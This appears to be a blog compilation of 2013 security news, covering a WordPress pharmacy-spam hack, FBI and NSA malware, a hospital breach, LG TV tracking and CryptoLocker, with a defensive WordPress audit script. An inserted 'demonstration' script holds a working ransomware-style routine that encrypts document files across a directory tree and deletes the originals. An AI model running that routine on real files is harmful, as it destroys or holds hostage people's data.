WordPress - Why it is important to update/patch on a regular basis

The problem of hacked WordPress sites continues, as illustrated by one compromised site being used, without its owners' knowledge, to host links to somewhere between ten thousand and ten billion shady pharmaceutical pages.

Security firm Blue Coat recently discovered that the storm.ca site, which belongs to a Canadian internet services company, was being used to host links to more than ten thousand pages of scam sites. After reporting the issue to the storm.ca team, the company quickly addressed the hack and shared some of the details behind it as an object lesson for others.

The sheer scale of the issue is notable: Blue Coat Malware Lab architect Chris Larsen determined that the number of pages the site was serving in the background was somewhere between ten thousand and ten billion. “Dozens of pages I tested between 1 and 10001 resolved, but page 9999999999 did not,” he explained in a blog post.

The issue is that these kinds of hacks are all too common, given the penetration of WordPress as a content management system. “Even a well-run site can fall victim to hacks focusing on WordPress, which seems to have a lot of weak links -- at least, judging by the amount of compromised sites we see in our logs each day,” Larsen said.

In this case, the intrusion took place when someone uploaded a PHP file-manager script through a vulnerability in the "wp_mailinglist" plugin. From there, the attackers could write files anywhere the web server's "nobody" user was allowed to write.

“This way, the attackers didn't need to literally load 10,000 or more junk pages onto the server -- that's the sort of thing that gets noticed!” Larsen said. “They could simply generate the pages as needed.”

The pages redirected visitors to pages for presumably bogus online pharmacies, which typically offer drugs like Viagra without a prescription.

Pharmacy scams – which, ironically, often feature “discount” prescriptions from Canadian online drug stores – typically attempt to separate desperate consumers from their money on a number of different fronts. Most offers selling medicines or drugs are designed to steal credit card details or to download damaging files (like spyware and key-loggers) onto a computer. Some just take the money and don’t deliver the goods. And in some cases, product is delivered but isn’t the real thing. In some cases, the medicines or other products may even damage the victim’s health.

As a guide for other sites, the storm.ca team shared its remediation (and on-going maintenance) steps: it removed or disabled unused plugins, and modified its Apache configuration to not allow the PHP engine to run on any files within the wp-content/uploads tree, so even if someone can upload arbitrary files in there, they won't be easily executable.

The team also removed write permissions on the wp-content tree and disabled allow_url_fopen and allow_url_include in php.ini. “It's convenient to allow WordPress to be able to self-update plugins, but not at the cost of having the whole directory tree forced to be writable by the server,” Larsen noted.

And, the team recommended the common-sense step of upgrading WordPress and all plugins to their latest versions.
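As an added example (not storm.ca's actual configuration, and not from the Blue Coat post), the POSIX shell script below applies and audits the remediation steps just listed on a WordPress tree: it emits an Apache fragment that turns the PHP engine off under wp-content/uploads, lists any PHP files already sitting in uploads, reports paths under wp-content that the web-server account can write to, and flags allow_url_fopen / allow_url_include if php.ini still has them on. The document root, the web-server user "nobody", the php.ini path and Apache 2.4 syntax ("Require all denied"; on 2.2 use "Order allow,deny" and "Deny from all") are assumptions to adjust for your server.

```shell
#!/bin/sh
# Added example, not storm.ca's own configuration: apply and audit the
# WordPress hardening steps described above. Assumptions: Apache 2.4, the
# site lives under /var/www/html, Apache runs as "nobody", php.ini is
# /etc/php.ini. Run with "--audit [site-root]" to report on a real install.

# 1. Apache fragment that stops PHP from running under wp-content/uploads.
#    "php_admin_flag engine off" covers mod_php; the FilesMatch block also
#    refuses to serve *.php at all, which covers php-fpm/CGI setups where the
#    engine flag is not honoured. Paste into the vhost (or .htaccess if
#    AllowOverride permits it).
uploads_apache_fragment() {
    cat <<EOF
<Directory "$1/wp-content/uploads">
    php_admin_flag engine off
    <FilesMatch "\.(php|phtml|php[0-9])\$">
        Require all denied
    </FilesMatch>
</Directory>
EOF
}

# 2. PHP files that have no business being in uploads. A file manager dropped
#    through a vulnerable plugin looks exactly like this.
php_files_in_uploads() {
    find "$1/wp-content/uploads" -type f \
        \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) 2>/dev/null
}

# 3. Paths under wp-content the web server can write to. World-writable is
#    always wrong; anything owned by the web-server user is writable by every
#    script it runs, which is the point Larsen makes about self-updating.
#    The user check is skipped if the account does not exist on this host.
writable_by_webserver() {
    site="$1"; webuser="${2:-}"
    if [ -n "$webuser" ] && id "$webuser" >/dev/null 2>&1; then
        find "$site/wp-content" \( -perm -002 -o -user "$webuser" \) 2>/dev/null
    else
        find "$site/wp-content" -perm -002 2>/dev/null
    fi
}

# 4. php.ini directives that still enable remote URL handling. Prints each
#    offending line; empty output means both flags are off.
php_ini_url_flags_on() {
    grep -iE '^[[:space:]]*allow_url_(fopen|include)[[:space:]]*=[[:space:]]*(on|1|true|yes)([[:space:]]|;|$)' "$1"
}

# Report mode for a real site; nothing runs when the file is only sourced.
if [ "${1:-}" = "--audit" ]; then
    site="${2:-/var/www/html}"
    echo "== PHP files under uploads (should be none):"
    php_files_in_uploads "$site"
    echo "== Paths under wp-content writable by the web server (should be none):"
    writable_by_webserver "$site" nobody
    echo "== php.ini URL flags still on (should be none):"
    php_ini_url_flags_on /etc/php.ini
    echo "== Apache fragment to add to the vhost:"
    uploads_apache_fragment "$site"
fi
```

The audit is deliberately read-only: it tells you what to fix and gives you the Apache fragment, but it does not chmod or chown anything, since the right ownership split (files owned by a deploy user, only uploads writable by the web server) depends on how the site is maintained.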

Site operators should take note. Pharmacy scams are tried and true, Larsen pointed out: Blue Coat's first internal blog post more than five years ago dealt with a hacked website (belonging to the government of Ghana) which was hosting links to, among other things, pharmaceutical sites. “However, the good old Viagra-SEP networks haven't gone away,” Larsen said.

Law Enforcement using Malware to SPY via Webcam


The Federal Bureau of Investigation (FBI) runs a computer team that uses malware to keep tabs on suspects and can secretly switch on a webcam, according to a report on the agency's search for a man called “Mo,” who allegedly used various forms of Internet communication to issue bomb threats across the United States last year.

Court documents showed that Mo, allegedly an Iranian, used to communicate through e-mail, video chat and Internet-based phone services without revealing his true identity, and was adept at covering his tracks. To zero in on such suspects, the FBI decided to call on its hackers to put together a piece of malware that was then delivered to Mo’s Yahoo e-mail account. The goal was to obtain information about Mo’s Internet usage and help investigators find his location, the Washington Post reported.

“We have transitioned into a world where law enforcement is hacking into people’s computers, and we have never had public debate,” Christopher Soghoian, principal technologist for the American Civil Liberties Union, told the Post. “Judges are having to make up these powers as they go along.”

According to the Post, the most common delivery mechanism is a simple phishing attack. When the suspect hits a link sent to his inbox by the FBI, it connects to a computer at the agency’s offices in Quantico, Va., and downloads the malicious software that allows the authorities to spy on the suspect through his webcam even without its indicator light turning on.

In Mo’s case, however, the FBI-backed hackers could not turn up much about him. Mo did click on the link that was sent to him, but the tool malfunctioned and “never actually executed as designed.” The only key information that the investigators managed to obtain was that Mo appeared to be in Tehran.

Meanwhile, as the Post noted, such types of online surveillance have pushed the boundaries of the constitutional limits on searches and seizures. According to the report, critics compare it to a physical search that seizes the entire contents of a home, rather than just those items that could be linked to a particular crime.

“You can’t just go on a fishing expedition,” Laura K. Donohue, a Georgetown University law professor who reviewed the court ruling on FBI surveillance software in Mo’s case, told the Post. “There needs to be a nexus between the crime being alleged and the material to be seized. What they are doing here, though, is collecting everything.”

While a federal magistrate in Denver approved sending the malware to Mo’s computer last year, another federal magistrate in Houston rejected an FBI plan in April to send surveillance software to a suspect in a different case, on grounds that it was “extremely intrusive” and could violate the Fourth Amendment.


The Next Question is: Will anti-malware software discover and remove LAW ENFORCEMENT sponsored malware?


Since we learned that the NSA has surreptitiously weakened Internet security so it could more easily eavesdrop, we've been wondering if it's done anything to antivirus products. Given that it engages in offensive cyberattacks -- and launches cyberweapons like Stuxnet and Flame -- it's reasonable to assume that it's asked antivirus companies to ignore its malware. (We know that antivirus companies have previously done this for corporate malware.)

My guess is that the NSA has not done this, nor has any other government intelligence or law enforcement agency. My reasoning is that antivirus is a very international industry, and while a government might get its own companies to play along, it would not be able to influence international companies. So while the NSA could certainly pressure McAfee or Symantec -- both Silicon Valley companies -- to ignore NSA malware, it could not similarly pressure Kaspersky Labs (Russian), F-Secure (Finnish), or AVAST (Czech). And the governments of Russia, Finland, and the Czech Republic will have comparable problems.

Even so, I joined a group of security experts to ask antivirus companies explicitly if they were ignoring malware at the behest of a government. Understanding that the companies could certainly lie, this is the response so far: no one has admitted to doing so.  Original post by Bruce Schneier @ https://www.schneier.com/blog/archives/2013/12/how_antivirus_c.html

So far only a handful of vendors have replied: ESET, F-Secure, Norman Shark, Kaspersky, Panda and Trend Micro. All of the responding companies confirmed that they detect state-sponsored malware, e.g. R2D2 and FinFisher. They also say they have never received a request not to detect malware, and that if any government asked them to do so in the future, they would not comply. All of the companies say there is no such thing as harmless malware.



90,000 Patients Data Compromised


The University of Washington Medical Center (UW Medicine) was breached in October, with data of up to 90,000 patients of Harborview Medical Center and University of Washington Medical Center affected. UW Medicine says no health data was taken, but Social Security numbers may have been exposed.

UW Medicine announced last week that up to 90,000 patients may have had personal data stolen. It stressed that health data was not involved. "Based on the results of an internal investigation, it is believed that patient information was not sought or targeted. However, the malware accessed the data files of roughly 90,000 Harborview Medical Center and University of Washington Medical Center patients."

Nevertheless, what was stolen is rich pickings for identity thieves: "name, medical record number, other demographics (which may include address, phone number), dates of service, charge amounts for services received at UW Medicine, Social Security Number or HIC (Medicare) number, date of birth."

The attack occurred in early October (2 October according to the Seattle Times) when an employee opened an email with a malicious attachment. "The malware took control of the computer, which had patient data stored on it. UW Medicine staff discovered this incident the following day and immediately took measures to prevent any further malicious activity."

UW Medicine has referred the matter to the FBI (although it doesn't say when). It began mailing the affected patients last week, and notes that "patients may be contacted by the FBI as part of its investigation." On the basis of this announcement, it took around eight weeks from learning of the breach to notifying patients, and the notification went out on the eve of Thanksgiving, one of America's most important holidays.

King 5 News reports on the reaction of one patient to the UW mailing. “The delay in letting us know is appalling; if it happened October 2nd, why are we just being notified the day after Thanksgiving?” Patricia Shiras said. The letter indicates that Social Security numbers and financial information were not compromised; the website, however, specifically lists SSNs. “I think my social security number and financial information are compromised and they're trying to cover it up,” Shiras said.

Komo News also quotes an unhappy patient. Susan Phillips, whose last contact with the hospital was in 2008, received one of the letters. "I opened it up and I read this and I just got furious," she said. "I don't have a word for it right now... Waiting until the day before Thanksgiving to do a bulk mailing?"

According to the Seattle Times, UW Medicine spokeswoman Tina Mankowski said it had taken more than a month "to analyze the activity and figure out which patients are most at risk of identity theft." She also said that it is "UW policy that if more than 500 accounts are compromised in an identity-theft attempt, the UW reports the incident to the media."

Are SMART TVs Watching You?

Is your internet-connected TV sending your viewing habits to the manufacturer? The findings below, which pertain to an LG smart TV, show exactly that: not only are the channels you watch being sent, but so are the filenames on any external media (such as a USB stick). A screenshot of the relevant preference screen is in the original post linked at the end of this section.



After some investigation, a rather creepy corporate video advertising their data collection practices to potential advertisers was found. It's quite long but a sample of their claims are as follows:

LG Smart Ad analyses users favourite programs, online behaviour, search keywords and other information to offer relevant ads to target audiences. For example, LG Smart Ad can feature sharp suits to men, or alluring cosmetics and fragrances to women.
Furthermore, LG Smart Ad offers useful and various advertising performance reports that live broadcasting ads cannot, to accurately identify actual advertising effectiveness.

In fact, there is an option in the system settings called "Collection of watching info:" which is set ON by default.  This setting requires the user to scroll down to see it and, unlike most other settings, contains no "balloon help" to describe what it does.


It turns out that viewing information appears to be sent regardless of whether this option is On or Off. A unique device ID is transmitted along with the channel name (for example "BBC NEWS"). The information appears to be sent unencrypted, in the clear, to LG every time you change the channel, even if you have gone to the trouble of switching collection of viewing information off. Not only is the channel you are watching sent to LG, but so are the filenames of any files stored on an external USB drive. While it is understandable that LG wants to display ads and gather viewing data, it is hard to see why LG needs to know what is on your USB media.


Original research and more information is found @ http://doctorbeet.blogspot.co.uk/2013/11/lg-smart-tvs-logging-usb-filenames-and.html

Police Agency hit with CRYPTOLOCKER virus

One of the most dreaded computer infections out there is ransomware, which locks up a system and renders files unusable until a set amount is paid to the hackers responsible. In other words, it amounts to little more than extortion, and law enforcement generally recommends that infected users bite the bullet and move on rather than pay the ransom. On Nov. 10, the Swansea, Mass., police department decided to eschew that advice, ponying up a significant payment to criminals.


Recently afflicted with the notorious CryptoLocker ransomware, the department paid two Bitcoins to liberate its files, which was the equivalent that day of $750.

Swansea Police Lt. Gregory Ryan told the local Fall River Herald News that no files were compromised and that the police report/booking software was unaffected by the attack. However, the lack of cyber-education was clear in his other comments: “It was an education for those who had to deal with it,” he said. “[The virus] is so complicated and successful that you have to buy these Bitcoins, which we had never heard of.”

The Swansea Police Department was hit on Nov. 6; and it bought the key and decrypted the files on Nov. 10. Since then it has improved its anti-virus protection, but Ryan noted that he believes “there is no foolproof way to lock your system down.”

CryptoLocker differs from earlier types of ransomware, which professionals could usually clean off a machine so that the files could be recovered. This malware offers essentially no remediation path short of restoring from backups. It uses a public key to encrypt a variety of file types, such as images, documents and spreadsheets, on every drive and in every folder it can reach from the compromised computer; the matching private key never leaves the attackers' server.

The malware then offers to trade money for a private, machine-specific key to unlock the encrypted files. A pay page with a countdown clock pops up, giving victims a limited time to buy back the private key for the data.

The two-Bitcoin ransom seems to be the norm for the malware; Bitcoin, as an online currency, has a fluctuating valuation, and last month two Bitcoins were worth half of what they are this week. Regardless of the amount, if the ransom goes unpaid the criminals destroy the private key after the specified time, meaning it is lost forever and the files cannot be recovered by ordinary software techniques.
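As an added example (not part of the original story, and not CryptoLocker's code), the POSIX shell script below reproduces the key-handling pattern described above, which CryptoLocker was reported to use: a fresh symmetric key per file, with that key wrapped under a 2048-bit RSA public key whose private half the victim never holds. It uses only the openssl command-line tool and operates solely on constructed sample files in a temporary directory it creates itself. The file-extension list and paths are assumptions for the demonstration. The point it makes is why a cleaned machine still has unreadable files: nothing on the victim side can unwrap the per-file keys.

```shell
#!/bin/sh
# Added example (not CryptoLocker's code): a benign, local demonstration of
# the hybrid public-key + symmetric-key scheme described above, using only the
# openssl command-line tool. Run it only against the constructed sample files
# it creates itself ("--demo").

# Attacker side: generate the RSA key pair. Only public.pem would ever ship
# with the malware; private.pem stays on the attackers' server.
make_keypair() {
    dir="$1"
    openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 \
        -out "$dir/private.pem" 2>/dev/null
    openssl pkey -in "$dir/private.pem" -pubout -out "$dir/public.pem"
}

# Victim side: a fresh random AES-256 key and IV per file, the file body
# encrypted with them, key+IV wrapped under the public key, original removed.
# Nothing here needs the private key, which is exactly why the infected
# machine cannot reverse it.
encrypt_file() {
    pub="$1"; f="$2"
    key=$(openssl rand -hex 32); iv=$(openssl rand -hex 16)
    openssl enc -aes-256-cbc -K "$key" -iv "$iv" -in "$f" -out "$f.enc"
    printf '%s %s\n' "$key" "$iv" |
        openssl pkeyutl -encrypt -pubin -inkey "$pub" -out "$f.key.wrapped"
    rm -f "$f"
}

# Walk a tree and hit document-like types ("images, documents and
# spreadsheets"); the extension list is an assumption for the demo. Exact
# suffixes are matched so the .enc and .key.wrapped outputs are never re-hit.
encrypt_tree() {
    pub="$1"; root="$2"
    find "$root" -type f \( -name '*.doc' -o -name '*.docx' -o -name '*.xls' \
        -o -name '*.xlsx' -o -name '*.jpg' -o -name '*.pdf' \) |
    while read -r f; do encrypt_file "$pub" "$f"; done
}

# Recovery: unwrap the per-file key with the private key, then decrypt.
# Returns non-zero, leaving the file encrypted, if the key is missing.
decrypt_file() {
    priv="$1"; f="$2"
    [ -r "$priv" ] || return 1
    openssl pkeyutl -decrypt -inkey "$priv" -in "$f.key.wrapped" \
        -out "$f.key" 2>/dev/null || { rm -f "$f.key"; return 1; }
    read -r key iv < "$f.key"
    openssl enc -d -aes-256-cbc -K "$key" -iv "$iv" -in "$f.enc" -out "$f" \
        2>/dev/null || { rm -f "$f" "$f.key"; return 1; }
    rm -f "$f.key" "$f.enc" "$f.key.wrapped"
}

# Demo: encrypt constructed files, "destroy" the private key as the
# countdown would, and show that recovery then fails.
if [ "${1:-}" = "--demo" ]; then
    work=$(mktemp -d)
    mkdir -p "$work/keys" "$work/docs"
    make_keypair "$work/keys"
    printf 'quarterly figures\n' > "$work/docs/report.xlsx"
    encrypt_tree "$work/keys/public.pem" "$work/docs"
    ls "$work/docs"
    rm "$work/keys/private.pem"
    decrypt_file "$work/keys/private.pem" "$work/docs/report.xlsx" \
        && echo "recovered" || echo "unrecoverable without the private key"
    rm -rf "$work"
fi
```

The design choice worth noticing is the split between the two halves: encrypt_file and encrypt_tree use only public.pem and random bytes, so removing the malware afterwards changes nothing about the files, and the only things that restore them are the private key or an offline backup taken before the infection.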

On the other hand, there’s no guarantee that the perpetrators would honor the payment in any event. Though in Swansea PD’s case, they did.

CryptoLocker is spreading rapidly, and was recently reported to be targeting millions of users in the UK via spam email. Closer to home, Matt Fernandes, owner of Somerset, Mass.-based computer shop WaveOne Technologies, told the Herald News that he's seeing five to 10 customers come in per week with the infection. He called the virus the “worst I've ever seen.”


Here is our story about a local business that was infected.


Related story (11/25/13): We're making TOO MUCH CASH, say CryptoLocker scum in ransom price cut.

NSA Infected 50,000 Networks with MALWARE


A new slide culled from the trove of documents leaked by Edward Snowden shows where the NSA placed malware on more than 50,000 computer networks worldwide, according to Dutch media outlet NRC.

The NSA management presentation slide from 2012 shows a world map spiderwebbed with "Computer Network Exploitation" access points.

Like all the NSA slides we've seen so far, this one is unlikely to win a Powerpoint beauty pageant anytime soon.

Not that this should distract anyone from the profoundly disturbing implications of this US government malware map that's being reported by a Dutch news agency -- an outlet to which the US government gave a "no comment."

Translated from Dutch:

    The American intelligence service -- NSA -- infected more than 50,000 computer networks worldwide with malicious software designed to steal sensitive information.

    Documents provided by former NSA employee Edward Snowden and seen by this newspaper, prove this.

    (...) The NSA declined to comment and referred to the US Government. A government spokesperson states that any disclosure of classified material is harmful to our national security.

An NSA Web page that outlines the agency's Computer Network Operations program describes Computer Network Exploitation, or CNE, as a key part of the program's mission and says CNE "includes enabling actions and intelligence collection via computer networks that exploit data gathered from target or enemy information systems or networks."

In late August, The Washington Post reported on the NSA's "hacking unit" called Tailored Access Operations (TAO).

The Post wrote:

    According to a profile by Matthew M. Aid for Foreign Policy, it's a highly secret but incredibly important NSA program that collects intelligence about foreign targets by hacking into their computers, stealing data, and monitoring communications.

    (...) Dean Schyvincht, who claims to currently be a TAO Senior Computer Network Operator in Texas, might reveal the most about the scope of TAO activities.

    He says the 14 personnel under his management have completed "over 54,000 Global Network Exploitation (GNE) operations in support of national intelligence agency requirements."

This is one letter away from being exact.

On the NSA's network ops page, there is no program with the acronym GNE -- only CNE and,

    Computer Network Attack (CNA): Includes actions taken via computer networks to disrupt, deny, degrade, or destroy the information within computers and computer networks and/or the computers/networks themselves.

    Computer Network Defense (CND): Includes actions taken via computer networks to protect, monitor, analyze, detect, and respond to network attacks, intrusions, disruptions, or other unauthorized actions that would compromise or cripple defense information.

Across the newly published slide top and bottom a stripe reads, "REL TO USA, AUS, CAN, GBR, NZL."

These are the so-called Five Eyes nations -- the U.S., U.K., Canada, Australia, and New Zealand -- that share intelligence.

Last week, the very same Five Eyes nations moved to oppose the United Nations' anti-surveillance, right-to-privacy draft resolution called "The Right to Privacy in the Digital Age."

Security researchers online are speculating that telecoms were the most likely targets for the malware.

    Only 50k milware installations globally? Must be restricted to the telcos, ISPs, banks, etc that allow for bulk collection.
    -- the grugq (@thegrugq) November 23, 2013

They may not be too far off the mark.

NRC cites an example of Britain's NSA counterpart, GCHQ, using spoofed LinkedIn pages to install surveillance malware on computers at the Belgian telecom Belgacom (translated):

    One example of this type of hacking was discovered in September 2013 at the Belgium telecom provider Belgacom.

    For a number of years the British intelligence service -- GCHQ -- has been installing this malicious software in the Belgacom network in order to tap their customer's telephone and data traffic.

    The Belgacom network was infiltrated by GCHQ through a process of luring employees to a false Linkedin page.

NRC concludes its article by telling us that the Dutch government's intelligence service has its own hacking unit, but that it's prohibited by law from engaging in the type of operations that the CNE slide suggests the NSA carried out.

This story originally appeared as "NSA malware infected over 50,000 computer networks worldwide" on ZDNet.
